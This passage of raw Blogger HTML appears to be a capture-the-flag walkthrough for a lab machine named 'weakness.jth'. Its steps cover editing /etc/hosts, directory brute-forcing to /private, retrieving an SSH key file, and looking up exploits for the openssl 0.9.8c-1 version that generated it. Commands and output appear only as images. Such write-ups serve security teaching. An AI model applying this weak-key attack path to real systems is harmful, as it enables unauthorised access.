text-align: left;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;621&quot; data-original-width=&quot;456&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjbuI_bu1pAmT3rE6GJcwTE2V_5J6vkvYXnxcujjB0KgT1wvsRP0uhNeznEJs44_6Rh6h2YN7Jnta5Y2eYQinVZyASvxEUTXJw8wh2lonN7L0ekAUttLhD12r0_P5deHF3n9ZduFwn8REdCV2Deb9FdheKpfxusyOVtPJ6aNXYEk3ea4OT4rIyvJmzQgw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgTAHhsqXYbt-L_4BP7bkhdCzRwHHr5MxkJaHwCUYQVIT3_u2AZljxXSnjNCfpq_QpU6JoKdd4Nbi9QeL_SSz2fpinptZm9vG8PRlEUwlWfdhs-NUaLlORtlkc-a1Hv4u_uKYMsRIdSFixS8whyveTOfjCmVE0d6TltXjZvR-uUAUy-m1G7X8ajMZrw1A&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;290&quot; data-original-width=&quot;502&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgTAHhsqXYbt-L_4BP7bkhdCzRwHHr5MxkJaHwCUYQVIT3_u2AZljxXSnjNCfpq_QpU6JoKdd4Nbi9QeL_SSz2fpinptZm9vG8PRlEUwlWfdhs-NUaLlORtlkc-a1Hv4u_uKYMsRIdSFixS8whyveTOfjCmVE0d6TltXjZvR-uUAUy-m1G7X8ajMZrw1A=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Editing &lt;b&gt;/etc/hosts&lt;/b&gt; by adding domain &lt;b&gt;weakness.jth&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgMUundzmGV_Y7s1WyqbfG3mxGxdZl4b4UTvRPpafPD78xDs013Kqy3v1JcMfFM4N50LtpKzrm97J0D-DhCnKWUs1yyWkUABraUUhow-jiWZ6Zg9iO9Gum6k81nQBrWf0V0aOJOIaLCvY5gPTrhFu9bTlDhLlCZS6-2OF_ulJJEPXhT0p_KrdFK4hBnJg&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;329&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgMUundzmGV_Y7s1WyqbfG3mxGxdZl4b4UTvRPpafPD78xDs013Kqy3v1JcMfFM4N50LtpKzrm97J0D-DhCnKWUs1yyWkUABraUUhow-jiWZ6Zg9iO9Gum6k81nQBrWf0V0aOJOIaLCvY5gPTrhFu9bTlDhLlCZS6-2OF_ulJJEPXhT0p_KrdFK4hBnJg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjOc5m1rGqWxq6t-kEkHmssLtD3Qe91ZCVueByJNRl_LQgbktz7-fnMs_hSeP0vC2J8VtJjOx1X85N0KcwHSz4fhRikF7V6aNf75T7vuxIysfV09yKJKZv3Hu8fH0rxzdMRx2GE-zCJjARLQmcYtB3ri20TNWGToKSr8ce93O3aZTOvrpImFH-ACyL4tQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;49&quot; data-original-width=&quot;294&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjOc5m1rGqWxq6t-kEkHmssLtD3Qe91ZCVueByJNRl_LQgbktz7-fnMs_hSeP0vC2J8VtJjOx1X85N0KcwHSz4fhRikF7V6aNf75T7vuxIysfV09yKJKZv3Hu8fH0rxzdMRx2GE-zCJjARLQmcYtB3ri20TNWGToKSr8ce93O3aZTOvrpImFH-ACyL4tQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting &lt;b&gt;weakness.jth&lt;/b&gt; we find&lt;b&gt; /private:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj4V0NetAKZmNWDKgUvcZXKEKsZ1zx2sJ8yxzTwAbDcMsEFFq_FZMU97LgFTPO8XaL2emF2O-ANA-rEVAoLFKJNIFxFlY_semoKDP-gwZcnrW7a7fuzMShHv2a4hvRCfXe9vjPhv-DkOJr0zO-b4YlaEFJSae1Elq7_F9nzmkZKdyIn1vwDo4m5KpJB4Q&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;791&quot; data-original-width=&quot;729&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj4V0NetAKZmNWDKgUvcZXKEKsZ1zx2sJ8yxzTwAbDcMsEFFq_FZMU97LgFTPO8XaL2emF2O-ANA-rEVAoLFKJNIFxFlY_semoKDP-gwZcnrW7a7fuzMShHv2a4hvRCfXe9vjPhv-DkOJr0zO-b4YlaEFJSae1Elq7_F9nzmkZKdyIn1vwDo4m5KpJB4Q=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;http://weakness.jth&lt;/b&gt;&amp;nbsp;it seems to be a rabbit hole, though there is a hint about a potential user &lt;b&gt;n30:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjQoEp98Bfr-6HwEK-qpQR9_kp8RtWG8v3IUoT0msGBX8yh4NsNEtiEf8r0BdZw7pAeOYwh5QlkW5vUFQcMXRzWumTJxK22rJY1O5lNPsetfwggZu2FpMcF8WljExf3y-YQfElt78-s-d-DsD_5-Dp_qHqDZ_SuosHTArd7nag67F1vs1AcAXvUZW6hPQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;713&quot; data-original-width=&quot;561&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjQoEp98Bfr-6HwEK-qpQR9_kp8RtWG8v3IUoT0msGBX8yh4NsNEtiEf8r0BdZw7pAeOYwh5QlkW5vUFQcMXRzWumTJxK22rJY1O5lNPsetfwggZu2FpMcF8WljExf3y-YQfElt78-s-d-DsD_5-Dp_qHqDZ_SuosHTArd7nag67F1vs1AcAXvUZW6hPQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;- However&amp;nbsp;&lt;/span&gt;&lt;b&gt;http://weakness.jth&lt;/b&gt;&lt;b&gt;/private&lt;/b&gt; provides interesting information:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjB-msEwfaFsj0NpvwvidtGRwc8NypvqtDZME9oJ1ghHlHP5poXCsOqv0PukXB3iz5Ehr3_MX-zDDGUVoaoLiHK-B774yubf9mDAX1-PNgZPsa1kEBqfWhTsxc6QWDHrA226-ralK7oGC1PTSyLIVv0C0ovYzvov4fJSR5OeHuQ6EE27zCfYCDjj6Y3cg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;581&quot; data-original-width=&quot;453&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjB-msEwfaFsj0NpvwvidtGRwc8NypvqtDZME9oJ1ghHlHP5poXCsOqv0PukXB3iz5Ehr3_MX-zDDGUVoaoLiHK-B774yubf9mDAX1-PNgZPsa1kEBqfWhTsxc6QWDHrA226-ralK7oGC1PTSyLIVv0C0ovYzvov4fJSR5OeHuQ6EE27zCfYCDjj6Y3cg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Downloading &lt;b&gt;mykey.pub&lt;/b&gt; and moving to the working directory it seems to be an encrypted key for SSH:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgfmSjvv2PXRVkceW1wv2VwRTG6kIkD_M007ULGbkrk24yv1ttKek-l479jM0HPY05Sk6FVo0W0y1zWMmUT9sWX-5xrVBOlFg4PECavU7Y3neCGKeT3N2FpV-rxVfGN9V1vm19vixU0SSBDvDbzkCsv6euYn1GnzJkKZa7y7yN3QatLPwtxcLWrLTK0bQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;54&quot; data-original-width=&quot;432&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgfmSjvv2PXRVkceW1wv2VwRTG6kIkD_M007ULGbkrk24yv1ttKek-l479jM0HPY05Sk6FVo0W0y1zWMmUT9sWX-5xrVBOlFg4PECavU7Y3neCGKeT3N2FpV-rxVfGN9V1vm19vixU0SSBDvDbzkCsv6euYn1GnzJkKZa7y7yN3QatLPwtxcLWrLTK0bQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjjsiPZw3CXwiTXwwixlyzToHXeUxGM5Yl_4jrUfe9Bnv7xRLoPz1Ms_kUGkkCniuDL1ljyPZaJKS80znglefn9b6mH5uXDsWJhM5cWRZiBQ1OegEPfKkJ5sg88ftryJw-wVFbTCDwjn94t-6Ql-9uLlV1QWuQEprHY0MmCBNVojgx30fbBanSOhzexMA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;219&quot; data-original-width=&quot;732&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjjsiPZw3CXwiTXwwixlyzToHXeUxGM5Yl_4jrUfe9Bnv7xRLoPz1Ms_kUGkkCniuDL1ljyPZaJKS80znglefn9b6mH5uXDsWJhM5cWRZiBQ1OegEPfKkJ5sg88ftryJw-wVFbTCDwjn94t-6Ql-9uLlV1QWuQEprHY0MmCBNVojgx30fbBanSOhzexMA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading&amp;nbsp;&lt;b&gt;notes.txt&lt;/b&gt; we learn that the key was generated by &lt;b&gt;openssl 0.9.8c-1:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEho-Y_3_yKHiBtuv6nU2Sfwpr10YJmglB14TvKhL4owa7kLnuN6W5SoQXDvYNBwObkHe8Cpqfk56gu-xgQiHxa7G6Jo5lt-lrjNlTBZmPFb124RsJHznVh9JoPNIBFSEsH6dsT8zZVBFGV8pNBMRym7YgNhmxcmCmQRTBF89v8F9bQ8kv3I7gr9Ch1HNw&quot; style=&quot;clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;143&quot; data-original-width=&quot;492&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEho-Y_3_yKHiBtuv6nU2Sfwpr10YJmglB14TvKhL4owa7kLnuN6W5SoQXDvYNBwObkHe8Cpqfk56gu-xgQiHxa7G6Jo5lt-lrjNlTBZmPFb124RsJHznVh9JoPNIBFSEsH6dsT8zZVBFGV8pNBMRym7YgNhmxcmCmQRTBF89v8F9bQ8kv3I7gr9Ch1HNw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for exploits related to&amp;nbsp;&lt;b&gt;openssl 0.9.8c-1:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgar_tVDF9Mc39d9TLXZoBL9EtrB5ZIr3r1Lh0i9NtI6iE8i5FiANdjS2AyP6sw56c7uV8Jawxo1Vb0-0HCXwN41nNShGdgBMkoJfty7h2RfUxf7udAmTG2cEEotsEmT1FA6I2MDtH_qBph9gQWGx_l-fY-qR-HTd3X0vP8RF4maojy4T2y0ZhUjyAgKg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;236&quot; data-original-width=&quot;1055&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgar_tVDF9Mc39d9TLXZoBL9EtrB5ZIr3r1Lh0i9NtI6iE8i5FiANdjS2AyP6sw56c7uV8Jawxo1Vb0-0HCXwN41nNShGdgBMkoJfty7h2RfUxf7udAmTG2cEEotsEmT1FA6I2MDtH_qBph9gQWGx_l-fY-qR-HTd3X0vP8RF4maojy4T2y0ZhUjyAgKg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEggLJE5eSra8oBnqOw0KWXJ9vyNhqp99PPgJ-xJYvSLsvKosRWYOofY8ltxXCOLlPi4iSK5l-N9my-9SimdF09iS6oyTXrEqncnrLTU-DjFH0lBrqPl9ijpkSrU_GAeulY3-dcORmggfgXNO16PmbPEXk6G9aA4vbP5ipMJsiyIxMkfqjVf1tL9vnsg2w&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;163&quot; data-original-width=&quot;267&quot; 